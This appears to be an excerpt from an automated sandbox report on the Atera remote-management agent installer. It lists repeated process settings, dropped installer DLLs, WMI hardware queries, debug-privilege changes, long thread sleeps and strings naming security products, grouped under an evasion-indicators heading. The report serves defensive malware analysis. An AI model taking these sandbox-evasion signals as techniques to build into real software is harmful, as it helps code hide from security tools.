                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 158ECAF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 158EE5D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 188971A0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 188AF700000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2AC50600000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2AC68700000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2C453010000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2C46B5F0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 20EC3970000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 20EDC050000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 2283
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 7315
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8A93.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmpJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8C79.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8B30.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 7940Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5660Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5932Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5472Thread sleep count: 2283 > 30
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5472Thread sleep count: 7315 > 30
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1552Thread sleep time: -22136092888451448s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1552Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2040Thread sleep count: 50 > 30
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2040Thread sleep time: -500000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2156Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1848Thread sleep time: -270000s >= -30000s
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2384Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4580Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6756Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1488Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8044Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7616Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4100Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 30000
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                              Source: AgentPackageAgentInformation.exe.15.drBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW B
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2648055048.00000188B0460000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: AteraAgent.exe, 0000000F.00000002.2643291786.00000188AFFC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW V4
                              Source: AteraAgent.exe, 0000000D.00000002.1533766772.00000158EC97D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBno
                              Source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~7
                              Source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                              Source: AgentPackageAgentInformation.exe, 00000017.00000002.2230821396.000002C46BD96000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2393367410.0000020EDC8A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: AgentPackageAgentInformation.exe, 00000013.00000002.1778616808.000002AC68FD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior
